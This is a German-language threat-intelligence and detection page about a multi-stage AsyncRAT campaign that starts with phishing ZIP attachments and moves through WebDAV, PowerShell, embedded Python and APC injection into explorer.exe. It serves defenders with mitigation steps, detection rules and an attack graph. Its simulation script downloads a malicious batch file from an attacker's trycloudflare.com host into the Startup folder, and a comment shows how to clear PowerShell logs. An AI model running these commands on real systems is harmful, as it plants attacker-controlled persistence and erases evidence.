Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt eine mehrstufige Angriffskette, die mit Phishing-E-Mails beginnt, die ZIP-Anhänge mit doppelter Erweiterung enthalten, und in eine WebDAV-gehostete Payload-Sequenz übergehen. Die Betreiber missbrauchen die kostenlose Cloudflare-Infrastruktur und gebündelte Python-Komponenten, um AsyncRAT auf den Endgeräten der Opfer zu installieren. Die Ausführung und Persistenz basieren auf nativen Windows-Tools—Windows Script Host, PowerShell und Batch-Skripte—während die letzte Phase Code-Injection in explorer.exe verwendet. Durch die Nutzung von weit verbreiteten Cloud-Diensten für die Lieferung und Bereitstellung fügt sich die Aktivität in den normalen Datenverkehr ein und kann herkömmliche Zugriffskontrollen an der Peripherie umgehen.
Untersuchung
Trend Micro-Ermittler berichteten von Telemetriedaten, die mit einem gestaffelten Lieferfluss übereinstimmen: Abruf eines .pdf.zip-Archivs von Dropbox, Ausführung eingebetteter .url-Verknüpfungen und nachfolgende WebDAV-Interaktion, die svchost.exe und rundll32.exe zugeschrieben wird. Die Kette setzte dann eingebettete Dateien von Python 3.14.0 ein, die verwendet wurden, um ein benutzerdefiniertes Python-Skript auszuführen, das für die APC-Injektion von AsyncRAT Shellcode verantwortlich war. Die Persistenz wurde durch das Ablegen von Batch-Dateien im Benutzer-Startup-Verzeichnis erreicht. Analysten identifizierten und korrelierten auch mehrere TryCloudflare-Hosts, die die Infrastruktur unterstützten.
Minderung
Reduzieren Sie die Angriffsfläche, indem Sie Benutzer schulen, doppelte Erweiterungsarchive und unerwartete ZIP-Anhänge als verdächtig zu behandeln, und indem Sie die Filterung von Phishing-übermittelten Cloud-Links verschärfen. Blockieren oder kontrollieren Sie den Zugriff auf nicht genehmigte Cloud-Tunneling-Dienste streng und überwachen Sie eine ungewöhnliche Abhängigkeit von WebDAV in Umgebungen, in denen es selten ist. Beschränken Sie die Skriptausführung von benutzerbeschreibbaren Verzeichnissen und stärken Sie die Kontrollen im Zusammenhang mit der Nutzung von Startup-Ordnern und der Erstellung geplanter Aufgaben. Priorisieren Sie EDR/Verhaltenserkennungen, die skriptgesteuerte Ausführungsketten und Codeinjektionstechniken aufdecken können, die auf gutartige Prozesse abzielen.
Reaktion
Wenn eine Aktivität erkannt wird, isolieren Sie das Endgerät und stoppen Sie verdächtige Prozesse, die mit der Kette in Verbindung stehen (insbesondere svchost.exe, rundll32.exe und python.exe, wenn sie mit dem Vorfall in Verbindung stehen). Entfernen Sie die Persistenz, indem Sie bösartige Batch-Artefakte aus dem Startup-Verzeichnis löschen, herunterladen Sie Python-Archive und alle AsyncRAT-Komponenten und führen Sie einen vollständigen forensischen Scan für zusätzliche Staging-Dateien und laterale Bewegungen durch. Aktualisieren Sie Netzwerksteuerungen und Blocklisten, um die identifizierten TryCloudflare-Domains und jede damit verbundene bei der Triagestufe beobachtete Infrastruktur einzuschließen.
„graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#ccffcc classDef malware fill:#ff9999 classDef process fill:#ccccff %% Knoten attack_phishing[„<b>Aktion</b> – <b>T1566.001 Spearphishing-Anhang</b>: Das Opfer erhält eine Phishing-E-Mail mit einem doppelt erweiterbaren .pdf.url-Anhang, der auf ein Dropbox-Archiv verweist.“] class attack_phishing action file_shortcut[„<b>Datei</b> – <b>.url-Verknüpfung</b>: Gibt sich als PDF-Rechnung aus und weist auf das bösartige Dropbox-Archiv hin.“] class file_shortcut file action_user_exec[„<b>Aktion</b> – <b>T1204.002 Benutzerausführung</b>: Der Benutzer öffnet die Verknüpfung und löst den initialen Download aus.“] class action_user_exec action file_archive[„<b>Datei</b> – <b>Dropbox-Archiv</b>: Erscheint als PDF-Rechnung und enthält die nächste Stufe der Nutzlasten.“] class file_archive file action_masquerade[„<b>Aktion</b> – <b>T1036.008 Vortäuschung</b>: Archiv und Verknüpfung imitieren legitime PDF-Dateien, um Verdacht zu vermeiden.“] class action_masquerade action tool_wsh[„<b>Werkzeug</b> – <b>Windows Script Host</b>: .wsh/.wsf-Dateien werden ausgeführt, um weitere Skripte zu erhalten.“] class tool_wsh tool action_script_proxy[„<b>Aktion</b> – <b>T1216 Systemskript-Proxy-Ausführung</b>: Führt WSH-Dateien als Proxy für den Skriptdownload aus.“] class action_script_proxy action tool_rundll32[„<b>Werkzeug</b> – <b>rundll32.exe</b>: Ruft davclnt.dll (DavSetCookie) auf, um mit einem WebDAV-Server zu kommunizieren.“] class tool_rundll32 tool action_rundll32[„<b>Aktion</b> – <b>T1218.011 Rundll32</b>: Verwendet rundll32, um mit einem Cloudflare-gehosteten WebDAV-Server zu kommunizieren.“] class action_rundll32 action tool_powershell[„<b>Werkzeug</b> – <b>PowerShell</b>: Lädt das Python 3.14 Embedded-Zip herunter, extrahiert es und zieht zusätzliche Batch-Dateien nach.“] class tool_powershell tool action_powershell[„<b>Aktion</b> – <b>T1059.001 PowerShell</b>: Führt PowerShell-Befehle zum Herunterladen und Extrahieren aus.“] class action_powershell action action_hide[„<b>Aktion</b> – <b>T1564.001 Artefakte verbergen</b>: Speichert Nutzlasten in versteckten Dateien im Benutzer-Temp-Verzeichnis.“] class action_hide action file_hidden[„<b>Datei</b> – <b>Versteckte Temp-Dateien</b>: ne.py, new.bin, a.txt wird in %TEMP% abgelegt und als versteckt markiert.“] class file_hidden file action_persistence[„<b>Aktion</b> – <b>T1037.001 Anmeldeskript</b>: Platziert Batch-Dateien im Autostart-Ordner zur Persistenz.“] class action_persistence action file_startup[„<b>Datei</b> – <b>Start-Batch-Dateien</b>: ahke.bat und olsm.bat befinden sich im Benutzer-Startup-Verzeichnis.“] class file_startup file action_ingress[„<b>Aktion</b> – <b>T1105 Ingress-Toolübertragung</b>: Überträgt zusätzliche bösartige Komponenten vom WebDAV-Server.“] class action_ingress action action_cloudapi[„<b>Aktion</b> – <b>T1059.009 Cloud-API</b>: Sendet HTTP/HTTPS-Anfragen an trycloudflare.com-Domänen, um finale Nutzlasten abzurufen.“] class action_cloudapi action action_injection[„<b>Aktion</b> – <b>T1055.004 Prozessinjektion</b>: Python-Skript ne.py injiziert AsyncRAT-Shellcode in explorer.exe über APC-Injektion.“] class action_injection action process_explorer[„<b>Prozess</b> – <b>explorer.exe</b>: Zielprozess für APC-Shellcode-Injektion.“] class process_explorer process malware_asyncrat[„<b>Malware</b> – <b>AsyncRAT</b>: Eingespritzter Shellcode etabliert ein Remote-Access-Tool.“] class malware_asyncrat malware action_c2[„<b>Aktion</b> – <b>T1102.002 Webdienst</b>: AsyncRAT kommuniziert bidirektional über HTTPS mit Cloudflare-Infrastruktur.“] class action_c2 action %% Verbindungen attack_phishing u002du002d>|liefert| file_shortcut file_shortcut u002du002d>|vom Opfer geöffnet löst aus| action_user_exec action_user_exec u002du002d>|lädt herunter| file_archive file_archive u002du002d>|verwendet in| action_masquerade action_masquerade u002du002d>|ermöglicht Ausführung von| tool_wsh tool_wsh u002du002d>|wird als Teil von ausgeführt| action_script_proxy action_script_proxy u002du002d>|ruft auf| tool_rundll32 tool_rundll32 u002du002d>|ruft auf| action_rundll32 action_rundll32 u002du002d>|bereitet Umgebung für| tool_powershell tool_powershell u002du002d>|führt aus| action_powershell action_powershell u002du002d>|speichert Dateien in| action_hide action_hide u002du002d>|erstellt| file_hidden file_hidden u002du002d>|wird verwendet von| action_persistence action_persistence u002du002d>|platziert| file_startup file_startup u002du002d>|löst aus| action_ingress action_ingress u002du002d>|holt mehr Komponenten über| action_cloudapi action_cloudapi u002du002d>|liefert Nutzlast an| action_injection action_injection u002du002d>|injiziert in| process_explorer process_explorer u002du002d>|hostet| malware_asyncrat malware_asyncrat u002du002d>|kommuniziert über| action_c2 „
Angriffsfluss
Erkennungen
Download oder Upload über PowerShell (via cmdline)
Anzeigen
LOLBAS WScript / CScript (via process_creation)
Anzeigen
Python-Datei im ungewöhnlichen Verzeichnis erstellt (via file_event)
Anzeigen
Verdächtige Trycloudflare Domain-Kommunikation (via proxy)
Anzeigen
Mögliche manuelle oder skriptgesteuerte Operation wurde in ungewöhnlichen Ordnern durchgeführt (via cmdline)
Anzeigen
Verdächtige Trycloudflare Domain-Kommunikation (via dns)
Anzeigen
IOCs (DestinationIP) zur Erkennung: Analyse einer mehrstufigen AsyncRAT-Kampagne via Managed Detection and Response
Anzeigen
IOCs (SourceIP) zur Erkennung: Analyse einer mehrstufigen AsyncRAT-Kampagne via Managed Detection and Response
Anzeigen
PowerShell-Befehl zum Herunterladen von Python- und Batchdateien für Umgebungssetup und Persistenz [Windows PowerShell]
Anzeigen
Phishing-Kampagne unter Verwendung von Edge und Cmd zur Ausführung eines Python-Skripts für Codeinjektion [Windows-Prozesserstellung]
Anzeigen
Simulation der Ausführung
Voraussetzung: Telemetrie & Basislinien-Vorkontrolle muss bestanden haben.
-
Angriffsnarrativ & Befehle
Ein Angreifer, der initialen PowerShell-Zugriff auf ein kompromittiertes Windows-Hostsystem erlangt hat, möchte eine Python-Ausführungsumgebung einrichten und Persistenz erreichen. Sie:
- Laden die eingebettete Python-Distribution herunter direkt auf den lokalen Benutzer
TempVerzeichnis mitInvoke‑WebRequest. - Laden ein bösartiges Batch-Skript herunter (
ahke.bat) von einer Cloudflare-proxied Domain in den Startup-Ordner des Benutzers, damit es bei jedem Anmelden ausgeführt wird. - Führen das heruntergeladene Python-Zip aus (hier der Kürze halber weggelassen), um weitere Payloads auszuführen.
Diese Schritte erzeugen genau die Befehlsstrings, die mit der Sigma-Regel übereinstimmen und PowerShell-Skriptblock-Logs mit dem
iwr … -OutFile …Muster generieren. - Laden die eingebettete Python-Distribution herunter direkt auf den lokalen Benutzer
-
Regressionstest-Skript
# ------------------------------------------------- # PowerShell-Simulation der AsyncRAT-Umgebungseinrichtung # ------------------------------------------------- # 1. Lade Python-Embedded-Zip in das Benutzer-Temp-Verzeichnis $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip" iwr $pythonUrl -OutFile $pythonDest # 2. Lade bösartige Batch-Datei für Persistenz in Startup $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat' $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" iwr $batUrl -OutFile $batDest # 3. (Optional) Führe die Batch-Datei aus, um Persistenz zu demonstrieren # Start-Process -FilePath $batDest -WindowStyle Hidden # ------------------------------------------------- -
Bereinigungskommandos
# Entferne die heruntergeladenen Artefakte Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue # Optional: PowerShell-Skriptblock-Logs löschen (erfordert Admin) # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"